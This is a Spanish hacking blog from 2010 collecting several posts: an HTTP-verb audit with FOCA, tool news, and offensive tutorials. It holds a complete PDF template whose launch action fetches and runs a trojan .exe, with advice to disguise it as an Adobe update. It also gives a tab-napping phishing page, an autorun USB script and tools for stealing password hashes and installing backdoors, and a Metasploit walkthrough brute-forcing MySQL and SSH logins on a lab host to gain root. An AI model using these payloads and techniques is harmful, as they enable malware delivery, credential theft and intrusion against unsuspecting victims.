27 jun 2010

[FOCA] y los verbos inseguros

Dentro de las especificaciones del protocolo HTTP se definieron una serie de verbos para dialogar con el servidor web. Por supuesto, a parte de los archi-famosos GET y POST existe una lista de verbos definidos en el estándar y mecanismos para extender y crear nuevos verbos.

Algunos que se usan comúnmente son HEAD, que en la FOCA se usa para descubrir el tamaño del fichero en la búsqueda de documentos antes de descargarlos y OPTIONS que permite ver la lista de verbos habilitados en una web tal y como se puede ver en la siguiente captura.


Figura 1: Uso de Options para descubrir los verbos habilitados

Sin embargo, algunas aplicaciones web habilitan los verbos para la manipulación de ficheros en el servidor, tales como DELETE, MOVE, COPY o PUT, ambos habilitados en el servidor utilizado para hacer la captura de la figura 1.

PUT permite subir ficheros o reemplazarlos si se sube un fichero con PUT y éste existe. entonces se machacaría el anterior. Estos comportamientos pueden suponer un riesgo para la seguridad de un sitio si se dejan habilitados en directorios públicos. Por supuesto, a pesar de que esté habilitado el verbo PUT o DELETE, después debería tener permisos el usuario con que corre el pool de la aplicación para escribir en el sistema de ficheros, pero, si así fuera, subir un Shell Web en PHP, ASP, JSP o lo que soporte el sistema sería trivial. Con un sencillo PUT /fichero.php HTTP/1.1 ya te puedes poner a escribir el código fuente.

Además de estos verbos, si el servidor a habilitado el protocolo WebDAV [Web-based Distributed Authoring and Versioning] aparecerán los verbos de trabajo colaborativo con documentos como LOCK, UNLOCK, PROPFIND, PROPPATCH y MKCOL.

Lógicamente, cuando haces una auditoría de seguridad a un servidor web es conveniente revisar esto que, aunque parezca una burrada, puede que alguien haya cometido el error de dejar algún directorio publicado con estos verbos.

Para agilizar este proceso, la FOCA que tenemos interna ya realiza esta búsqueda. Por cada dominio web que se descubre se genera una lista de URLs detectadas en los buscadores. Estas URLs pueden venir de la búsqueda de documentos, de la búsqueda de servidores (usando el panel de DNS Search), buscando las tecnologías utilizadas en el dominio o, directamente, buscando todos los links en los buscadores relativos a ese dominio.

FOCA sacará todos los directorios y realizará dos pruebas: Si el directorio está abierto y cuáles son los verbos inseguros en ese dominio. Los resultados salen como se pueden ver en la imagen siguiente.


Figura 2: Verbos inseguros descubiertos por FOCA

Si estás a cargo de la seguridad de un sitio web, cuidado con los verbos que tienes habilitados.

Saludos Malignos!
 

[Tab Napping] Técnica Phishing

Phishing Technique: Tab Napping short code

Author: Jordan Diaz (aka Jbyte)
Website:http://jbyte-security.blogspot.com/

El "tab napping" se aprovecha de los nuevos navegadores y su sistema de varias pestañas. En ellos, sólo hace falta abrir en una ventana el navegador, y se pueden abrir varias pestañas (pulsando la combinación Control T o simplemente asiendo click) para poder navegar en varias páginas a la vez.

Este sistema reconoce qué pestañas están siendo usadas y cuales, aunque están abiertas, no han sido utilizadas en un rato. Estas últimas, cambian sin que nos demos cuenta a una de esas webs clonadas, y si tenemos la mala suerte de entrar en esa pestaña y meter nuestros datos bancarios, los delincuentes ya los tendrán para hacer con ellos lo que quieran.

¿Cómo funciona?
Este sistema instala un código Java Script en nuestro navegador, que hace que la página buena, por ejemplo la del Banco Santander, cambia a una página clonada, sin que, a priori, nos demos cuenta, cuando la pestaña en la que se muestra la web legal del Banco Santander lleve un rato inactiva.

¿Cómo evitarlo?
Podemos identificar si la web es segura o no observando la barra de direcciones. Si la URL empieza con una dirección HTTPS:// es segura.

Siempre, y repetimos, SIEMPRE, hay que fijarse que la dirección de la página de nuestro banco o de una tienda en la que queramos comprar empieza de este modo, antes de dar nuestro número de tarjeta o nuestra contraseña. Es la manera de comprobar que la página está verificada y protegida de timos como éste o como el phising.

Sencillo pero las prisas del día a día o simplemente los descuidos hacen que en ocasiones nos queden.

Short Code:
<html>
<head>
<script type="text/javascript">
function setFocus(){
document.getElementById("surname").focus();
}
function sinfoco()
{var pagina = 'http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png';
//document.getElementById("searchBox").focus();
//document.location.href=pagina;
document.documentElement.innerHTML="<html><img src='http://img.skitch.com/20100524-b639xgwegpdej3cepch2387ene.png'></html>";
}

</script>
</head>

<body onload="setFocus();">
  <form>
       Name: <input type="text" id="name" size="30"><br />
       Surname: <input type="text" id="surname" size="30" onblur=sinfoco()>

  </form>

</body>

</html>

Solo nos queda copiar el texto y guardarlo como un archivo html y listo, nos al cambiar de pestaña nos redirigirá a una web con una imagen de Gmail.

FIN

Fuente: http://www.exploit-db.com/


A New Type of Phishing Attack from Aza Raskin on Vimeo.

22 jun 2010

[VirtualBox] Tutorial completo de Virtualización

ANTRAX ha realizado un tutorial (PDF) con imágenes bastante bueno donde nos enseña sobre Cómo instalar VirtualBox, Cómo configurarlo, Cómo ponerle internet y Cómo pasar archivos de la PC real a la Virtual.

Sin duda de recomendable lectura ya que VirtualBox es un programa de virtualización gratuito bastante completo y una excelente alternativa a VMware que es de pago. Además recordemos que lo mejor para hacer tus Pentest es sin duda hacerlos bajo una maquina virtual para no correr ningún tipo de riesgo.

Descarga Tutorial VirtualBox By ANTRAX
Autor: ANTRAX
Formato: PDF
Peso: 1.2 MB

Fuente: http://foro.elhacker.net/

[GoogleCL] Utilidad para usar los servicios de Google mediante línea de comandos

lineadecomandosGoogleCL es una utilidad de línea de comandos que proporciona acceso a diversos servicios de Google. Se trata de una aplicación en Python que utiliza las librerías GData para hacer llamadas a la API de datos de Google desde la línea de comandos.

Una vez que hayas descargado e incorporado GoogleCL mediante el paquete .deb de Linux (que pronto en los repositorios de Debian y Ubuntu), podrás conectarse desde consola y utilizar servicios como Blogger, Calendario, Contactos, Docs, Picasa y Youtube, entre otros.

Con estos comandos podrás editar, crear y subir contenidos. Por ejemplo:
$ google blogger post --blog "Mi blog" --tags "python,  googlecl, development" my_post.html
$ google calendar add "Hoy lanzamiento de  i0S4"
$ google docs edit --title "Lista de Compras" --editor vim

Link: Introducing the Google Command Line Tool (Google Open Source)

Fuente: http://www.fayerwayer.com/

19 jun 2010

[UserAssist] Descubriendo qué programas fueron ejecutados en Windows

UserAssist nos permite visualizar una lista de los programas que fueron ejecutados en un sistema Windows, junto a la cantidad de veces que cada programa se ejecutó, y la última fecha y hora de utilización.

Windows Explorer suele mostrar esta información en la parte izquierda del Start menu de XP, y la lista de los programas usados frecuentemente es guardada en la Registry de Windows bajo la siguiente key:

HKEY_CURRENT_USER \  Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ UserAssist

Cuando UserAssist es ejecutado descifra los datos de la Registry y los visualiza como vemos a continuación:


Sin dudas esta pequeña herramienta puede aportar información muy importante a cualquier examinador forense.

Su autor, Didier Stevens, publicó UserAssist junto al código fuente del programa en su website. Para poder utilizar UserAssist, primero hay que tener instalado el .NET Framework 2.0 runtime.

Descargar UserAssist 2.4.3

Fuente: http://www.kungfoosion.com/

Afíliante a Hacking [Blackploit] !!

Para Afiliarte a Hacking [Blackploit] debes cumplir con 5 requisitos:

  1. Tener un link, mini banner o banner de Hacking [Blackploit] en tu web y que se redireccione a "http://www.blackploit.com/".
  2. El link, mini banner o banner tienes que estar en la página principal y visible.
  3. Tu web no debe estar en construcción, ni ser muy nueva (debe tener un flujo de usuarios [mínimo 500 visitas únicas diarias]).
  4. Tu web debe actualizarce frecuentemente.
  5. No se permiten webs con contenido para adultos, violento, bizarro o que pueda molestar a alguien. Ojala que sea referente a informática.
  6. No se Admitirán  Web que tengan contenido sin hacer referencia a su autor, sin poner fuentes y/o referencias.
    Si tu web cumple con los requisitos, envía un mail a [email protected] con el siguiente formato:

    Asunto: Afiliate
    Mensaje:
    [URL de tu web]
    [Nombre de tu web (no más de 22 dígitos)]
    [mini banner de 88x31 de tu web (Opcional)]

    Mini-Banner Hacking [Blackploit]:

    Más Banners

    Apenas llegue el mail me pondré al contacto lo más rápido posible ;)

    [+] Salu2
    [+] ZioneR

    18 jun 2010

    Ejecutar *.exe al abrir un PDF

    Bueno.. me descargué un video donde explicaban el método y decidí escribir un pequeño tutorial de como hacer que al abrir un PDF se descargué y ejecute un *.exe.

    Necesitamos:
    1. Nuestro *.exe (troyano, keylogger, bot, joke, etc...)
    2. Un FTP.
    Dos simples cosas... Bueno, una vez definido el *.exe que vamos a usar, lo vamos a subir a un FTP, puede ser cualquiera que te deje subir archivos y descargarlos directamente con el formato ftp.miftp/server_troyano.exe también sirve algún uploader que deje la url en el mismo formato y que sea directo (sin captcha y sin retraso), en este caso no sirve ni megaupload, ni rapidshare, etc...

    Si no encuentran buenos FTP, dense una vuelta por http://www.free-webhosts.com/webhosting-01.php.

    Empecemos:

    Bueno... ahora manos a la obra...

    Inicio --> ejecutar --> notepad.exe

    Pegan este código:
    %PDF-1.1
    
    1 0 obj
    <<
     /Type /Catalog
     /Outlines 2 0 R
     /Pages 3 0 R
     /OpenAction 8 0 R
    >>
    endobj
    
    2 0 obj
    <<
     /Type /Outlines
     /Count 0
    >>
    endobj
    
    3 0 obj
    <<
     /Type /Pages
     /Kids [4 0 R]
     /Count 1
    >>
    endobj
    
    4 0 obj
    <<
     /Type /Page
     /Parent 3 0 R
     /MediaBox [0 0 612 792]
     /Contents 5 0 R
     /Resources 
     << /ProcSet 6 0 R
        /Font << /F1 7 0 R >>
     >>
    >>
    endobj
    
    5 0 obj
    << /Length 46 >>
    stream
    BT
    /F1 24 Tf
    100 700 Td
    (Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
    ET
    endstream
    endobj
    
    6 0 obj
    [/PDF /Text]
    endobj
    
    7 0 obj
    <<
     /Type /Font
     /Subtype /Type1
     /Name /F1
     /BaseFont /Helvetica
     /Encoding /MacRomanEncoding
    >>
    endobj
    
    8 0 obj
    <<
     /Type /Action
     /S /Launch
     /Win
     <<
      /F (http://www.FTP-gratuito.com/server_troyano.exe)
     >>
    >>
    endobj
    
    xref
    0 9
    0000000000 65535 f
    0000000012 00000 n
    0000000109 00000 n
    0000000165 00000 n
    0000000234 00000 n
    0000000401 00000 n
    0000000505 00000 n
    0000000662 00000 n
    trailer
    <<
     /Size 9
     /Root 1 0 R
    >>
    startxref
    751
    %%EOF

    Aquí lo único que tiene que modificar es:
      /F (http://www.FTP-gratuito.com/server_troyano.exe)
    En http://www.FTP-gratuito.com/server_troyano.exe ponen el link de su *.exe previamente subido a un FTP.

    Si quieren también pueden modificar esto:
    (Hacking[Blackploit]--> Blackploit.blogspot.com)Tj
    En Hacking[Blackploit]--> Blackploit.blogspot.com va el texto que aparecerá en el pdf cuando se abra.

    Ya modificado todo, guardan el documento como exploit.pdf o como quieran, lo importante es que termine en *.pdf

    Resultado:

    Al abrir el pdf nos salta una ventana pidiendo que ejecutemos un *.exe.
    Recomendanción: que su *.exe se llame Adobe-Update.exe.
    Al poner abrir se ejecuta nuestro *.exe.

    Para más detalles vean el video de donde saque la información: ExploitPdf.avi
    Aquí el exploit: Exploit.pdf

    Fuente: http://indetectables.net/

    [+] Salu2
    [+] ZioneR

    15 jun 2010

    Cómo crear un USB Drive (Pendrive) Auto-Hacking

    Bueno, primero les pongo un texto introductorio a los "Ataques USB con tecnología U3" y luego un video de como crear un buen Pendrive (USB Drive) para comprometer el sistema mediante un autorun.inf.

    Ataques USB con tecnología U3
    Introducción

    A continuación se describen los diversos ataques que se pueden llevar a cabo mediante dispositivos de almacenamiento USB U3. Estos ataques consisten en la mayoría de casos, en el robo de información del ordenador donde se conecta el dispositivo USB, pero también es posible la instalación de puertas traseras con la finalidad de tomar un mayor control sobre el ordenador.

    La vulnerabilidad

    El ataque es posible realizarlo debido a la opción Autorun que hasta Windows XP SP3 permanecía activada por defecto. Dicha opción habilita al Sistema Operativo a ejecutar sentencias y programas automáticamente una vez se ha introducido el CD/DVD en el ordenador. El Sistema Operativo lee el fichero Autorun.inf contenido en el directorio raíz del CD/DVD donde se especifica qué ejecutar. De esta manera, por ejemplo, sería posible instalar programas que registren las pulsaciones introducidas en el ordenador y posteriormente enviarlas por correo electrónico.

    El ataque

    Los dispositivos con tecnología U3 contienen una partición que simula ser una unidad de CD-ROM virtual. Este tipo de dispositivos permiten la ejecución de programas directamente desde el dispositivo, sin necesidad de instalación en el equipo al que se conecta. Así pues, además de contener la unidad de CD-ROM virtual que normalmente suele ser bastante pequeña en tamaño, contiene una partición mayor donde se almacenan las aplicaciones a ejecutar.

    Dicho esto, la característica que se va a aprovechar es la de auto ejecución al insertar un CD-ROM, que en nuestro caso se tratará del dispositivo USB con la unidad virtual. Como se ha explicado antes, esta opción se encuentra activada por defecto en las versiones del Sistema Operativo Windows anteriores a la versión XP SP2 y permite la ejecución de las sentencias que se especifiquen en el fichero Autorun.inf, cosa que hará innecesaria la actuación del usuario para la ejecución de cualquier sentencia o programa en el equipo.

    Herramientas disponibles

    Para llevar a cabo el ataque, lo primero que se debe hacer es modificar el contenido de la unidad de CD-ROM virtual con la finalidad de que ejecute lo que nosotros queramos. Esto se puede llevar a cabo mediante una serie de herramientas disponibles las cuales se describirán a continuación:

    - Universal U3 LaunchPad Hacker: Esta herramienta nos permite reemplazar el contenido de la unidad de CD-ROM virtual por una imagen ISO personalizada por nosotros con aplicaciones destinadas al Slurping o robo de información. Cabe destacar que en la otra partición del disco duro, en la que es posible la escritura, se crea de manera oculta un directorio con los datos del programa.

    - SwitchBlade: Utiliza herramientas conocidas como pwdump, mailpassview entre otras para el robo de información.

    Una vez es conectado el dispositivo USB a un equipo típico con Windows XP SP2 o anterior, en aproximadamente 30 segundos el programa habrá copiado al dispositivo datos sensibles del sistema como por ejemplo claves de registro de productos de Microsoft, lista de parches de seguridad instalados, hashes de contraseñas SAM, contraseñas almacenadas en la caché del equipo, contraseñas almacenadas en navegadores web, historial de navegación, etc.

    - Hacksaw: Este payload es similar al anterior pero añade algunas funciones más interesantes como:

    a) Instala en el sistema un programa que se inicia automáticamente al iniciar el Sistema Operativo el cual se encarga de recopilar datos sensibles como contraseñas, caché, historiales, etc., comprimirla y enviarla a un dirección de correo electrónico configurada por el atacante.

    b) Instala una herramienta de escritorio remoto llamada VNC, que permite al atacante administrar remotamente el equipo.

    c) Ejecuta un escaneo de la red local a la que el equipo está conectado obteniendo un mapa de red que se enviará por correo electrónico al atacante.

    Fuente: http://stefan.diosdelared.com/

    [Video] Como crear un USB Drive (Pendrive) Auto-Hacking


    This video will show you how to make an auto-hacking USB drive and how to protect yourself from them.

    U3 Universal customizer - http://www.u3community.com/viewtopic.php?t=434
    Batch to exe converter - http://download.cnet.com/Bat-To-Exe-Converter/3000-2069_4-10555897.html
    Nirsoft Utilities - http://www.nirsoft.net

    AUTORUN SCRIPT:
    [Autorun]
    open=launch.exe -a
    LAUNCH.BAT SCRIPT:
    usb.vbs
    USB.VBS SCRIPT:
    Dim oFSO, oDrive, objFolder, oDestination, shell
    Const USBDRIVE=1
    oDestination = “c:test”
    set oFSO = Wscript.CreateObject(“Scripting.FileSystemObject”)
    Set shell=createobject(“wscript.shell”)
    For Each oDrive in oFSO.Drives
    If oDrive.DriveType = USBDRIVE And oDrive.DriveLetter <> “A”  Then
    shell.run oDrive.DriveLetter & “:batch.bat”
    set shell=nothing
    End If
    Next
    Sub CopyFiles(oPath, oDst)
    Set objFolder = oFSO.GetFolder(oPath)
    For Each Files In objFolder.Files
    WScript.Echo “Copying File”,Files
    newDst=oDst&”"&Files.Name
    oFSO.CopyFile Files,newDst,True
    WScript.Echo Err.Description
    Next
    End Sub

    Fuente: http://www.tinkernut.com/

    Fuerza Bruta SSH



    Bueno, este es un paper hecho por Progresive Death donde explica como usar las Tools SSH Bruteforcer que se encuentra en backtrack4, Escaneo y Ataque de Fuerza Bruta hacia SSH, para poder establecer la conexión con la sesión SSH que hemos conseguido. Aquí el paper:

    Brute Ssh


    Autor:
    Progresive Death
    Fuente: http://charsecurity.blogspot.com/

    [Video] Sniffear teclados en una red LAN



    Autor: DarkSpark
    Fuente: http://foro.latinohack.com/

    11 jun 2010

    Intrusión a MySQL y luego obteniendo Shell Root

    Hola hoy les haré un pequeño tutorial con metasploit para hacer una intrusión a una base de datos mysql para después poder obtener shell root por ssh

    Empecemos?

    Escaneamos con NMAP los puertos:
    nmap -sV --allports --version-all 192.168.1.34
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         ProFTPD 1.3.1
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
    139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB
    8009/tcp open  ajp13?
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1

    Acá lo que nos interesa:
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5

    Abramos metasploit
    Usaremos el auxiliary
    mysql_login
    msf > use scanner/mysql/mysql_login
    msf auxiliary(mysql_login) > show options
    
    Module options:
    
       Name              Current Setting  Required  Description
       ----              ---------------  --------  -----------
       BLANK_PASSWORDS   true             yes       Try blank passwords for all users
       BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
       PASSWORD                           no        A specific password to authenticate with
       PASS_FILE                          no        File containing passwords, one per line
       RHOSTS                             yes       The target address range or CIDR identifier
       RPORT             3306             yes       The target port
       STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
       THREADS           1                yes       The number of concurrent threads
       USERNAME                           no        A specific username to authenticate as
       USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
       USER_FILE                          no        File containing usernames, one per line
       VERBOSE           true             yes       Whether to print output for all attempts

    Agregamos el host:
    msf auxiliary(mysql_login) > set RHOSTS 192.168.1.34
    RHOSTS => 192.168.1.34

    Ahora agregamos con el user que se va a loguear yo en mi caso voy a probar con root:
    msf auxiliary(mysql_login) > set USERNAME root
    USERNAME => root

    Y ahora voy a usar la opción PASS_FILE para hacer un brute force :P al login y intentar longuearse con las contraseñas :P
    msf auxiliary(mysql_login) > set PASS_FILE /home/linuxfer/Escritorio/pass.txt
    PASS_FILE => /home/linuxfer/Escritorio/pass.txt

    Ejecutamos el axuriliary:
    msf auxiliary(mysql_login) > run
    [*] 192.168.1.34:3306 - Found remote MySQL version 5.0.51a
    [*] 192.168.1.34:3306 Trying username:'root' with password:''
    [*] 192.168.1.34:3306 failed to login as 'root' with password ''
    [*] 192.168.1.34:3306 Trying username:'root' with password:'murderking'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'murderking'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'duraznin'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'duraznin'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'pete'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'pete'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'oxono'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'oxono'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'puto'
    [*] 192.168.1.34:3306 failed to login as 'root' with password 'puto'
    [*] 192.168.1.34:3306 Trying username:'root' with password:'root'
    [+] 192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed
    msf auxiliary(mysql_login) > 

    Como vemos se logueo con root root
    192.168.1.34:3306 - SUCCESSFUL LOGIN 'root' : 'root'

    Abrimos una nueva terminal y ejecutamos
    mysql -h 192.168.1.34 -u root -p root
    -h: host
    -u:usuario
    -p:password

    linuxfer@linuxfer-laptop:~$ mysql -h 192.168.1.34 -u root -proot
    Welcome to the MySQL monitor.  Commands end with ; or \g.
    Your MySQL connection id is 38
    Server version: 5.0.51a-3ubuntu5 (Ubuntu)
    
    Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
    
    mysql> 

    Ya estamos dentro del server mysql
    mysql> show grants;
    +--------------------------------------------------------------------------------------------------------------------------------+
    | Grants for root@%                                                                                                              |
    +--------------------------------------------------------------------------------------------------------------------------------+
    | GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY PASSWORD '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' WITH GRANT OPTION |
    +--------------------------------------------------------------------------------------------------------------------------------+
    1 row in set (0.00 sec)

    Veamos los roots :P
    mysql> select load_file('/etc/passwd');
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    dhcp:x:101:102::/nonexistent:/bin/false
    syslog:x:102:103::/home/syslog:/bin/false
    klog:x:103:104::/home/klog:/bin/false
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
    bind:x:105:113::/var/cache/bind:/bin/false
    postfix:x:106:115::/var/spool/postfix:/bin/false
    ftp:x:107:65534::/home/ftp:/bin/false
    postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
    tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
    distccd:x:111:65534::/:/bin/false
    user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
    service:x:1002:1002:,,,:/home/service:/bin/bash
    telnetd:x:112:120::/nonexistent:/bin/false
    proftpd:x:113:65534::/var/run/proftpd:/bin/false

    Mmmmmm.. parece que el usuario es msfadmin volvamos a metasploit ahora usaremos el auxiliary
    scanner/ssh/ssh_login
    msf auxiliary(mysql_login) > use scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > show options
    
    Module options:
    
       Name              Current Setting  Required  Description
       ----              ---------------  --------  -----------
       BLANK_PASSWORDS   true             yes       Try blank passwords for all users
       BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
       PASSWORD                           no        A specific password to authenticate with
       PASS_FILE                          no        File containing passwords, one per line
       RHOSTS                             yes       The target address range or CIDR identifier
       RPORT             22               yes       The target port
       STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
       THREADS           1                yes       The number of concurrent threads
       USERNAME                           no        A specific username to authenticate as
       USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
       USER_FILE                          no        File containing usernames, one per line
       VERBOSE           true             yes       Whether to print output for all attempts

    Agregamos host:
    msf auxiliary(ssh_login) > set RHOSTS 192.168.1.34
    RHOSTS => 192.168.1.34

    Agregamos el user:
    msf auxiliary(ssh_login) > set USERNAME msfadmin
    USERNAME => msfadmin

    Agregamos las pass con las que queremos que haga el brute force
    msf auxiliary(ssh_login) > set PASS_FILE /home/linuxfer/Escritorio/pass2.txt
    PASS_FILE => /home/linuxfer/Escritorio/pass2.txt

    Ejecutamos el auxiliary:
    msf auxiliary(ssh_login) > run
    
    [*] 192.168.1.34:22 - SSH - Starting buteforce
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: ''
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':''
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'jaja'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'jaja'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pete'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pete'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'tutorial'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'tutorial'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'ddlr'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'ddlr'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'pam'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'pam'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'paquero'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'paquero'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'duraznin'
    [-] 192.168.1.34:22 - SSH - Failed: 'msfadmin':'duraznin'
    [*] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
    [*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
    [+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    Que tal se logueo con msfadmin y msfadmin:
    *] 192.168.1.34:22 - SSH - Trying: username: 'msfadmin' with password: 'msfadmin'
    [*] Command shell session 1 opened (192.168.1.33:58907 -> 192.168.1.34:22) at Thu Jun 10 17:55:19 -0300 2010
    [+] 192.168.1.34:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '

    Bueno ya esta creada la sessión con la shell veamos:
    Active sessions
    ===============
    
      Id  Type   Information                              Connection
      --  ----   -----------                              ----------
      1   shell  SSH msfadmin:msfadmin (192.168.1.34:22)  192.168.1.33:58907 -> 192.168.1.34:22
    msf auxiliary(ssh_login) > sessions -i 1
    [*] Starting interaction with 1...
    
    id
    uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
    pwd
    /home/msfadmin
    uname -a
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

    Bien ahora abramos una nueva terminal y conectemosno por ssh para obtener shell root
    linuxfer@linuxfer-laptop:~$ ssh [email protected]
    The authenticity of host '192.168.1.34 (192.168.1.34)' can't be established.
    RSA key fingerprint is 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '192.168.1.34' (RSA) to the list of known hosts.
    [email protected]'s password: 

    Nos pide pass recuerden que es msfadmin tipeamos y
    Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
    
    The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.
    
    To access official Ubuntu documentation, please visit:
    http://help.ubuntu.com/
    No mail.
    Last login: Thu Jun 10 15:15:54 2010
    msfadmin@metasploitable:~$ 

    Ya tenemos shell ahora solo tenemos que tipear sudo -i la pass msfadmin y ya tenemos shell root
    msfadmin@metasploitable:~$ sudo -i
    [sudo] password for msfadmin: 
    root@metasploitable:~# id
    root@metasploitable:~# id
    uid=0(root) gid=0(root) groups=0(root)
    root@metasploitable:~# 

    Game over (?)

    Bueno espero que les halla gustado y hallan entendido bien perdon por no hacer un video pero es que tengo unos problemillas :P


    Autor: linuxfer
    Fuente: http://linuxfer.diosdelared.com/

    Impresora de Lego

    El video lo dice todo, una impresora hecha de un circuito, legos y un lápiz scripto XD.



    Fuente: http://www.boingboing.net/

    [Hashcat] Advanced Password Recovery (*nix / Windows)

    Hashcat, básicamente, vendría a ser la versión "free" de PasswordsPro. Como ventajas les puedo comentar que en si es mucho más rápida que ésta (es multi-threading), soporta una gran cantidad diversa de hashes, y lo mejor, es gratuita y disponible para Windows / *nix. Adicionalmente existe una versión GUI para Windows. Más abajo también les dejo oclHashcat, lo mismo pero que utiliza el CPU de Nvidia (CUDA) o ATI, según se disponga (mucho más veloz).

    Características (Inglés) (Hashcat):

    * Free
    * Multi-Threaded
    * Multi-Hash
    * Linux & Windows native binaries
    * Fastest cpu-based multihash cracker
    * SSE2 accelerated
    * All Attack-Modes except Brute-Force and Permutation can be extended by Hybrid-Attack rules
    * Very fast Hybrid-Attack engine
    * Rules mostly compatible with JTR and PasswordsPro
    * Possible to resume or limit session
    * Automatically recognizes recovered hashes from outfile at startup
    * Can automatically generate random rules for Hybrid-Attack
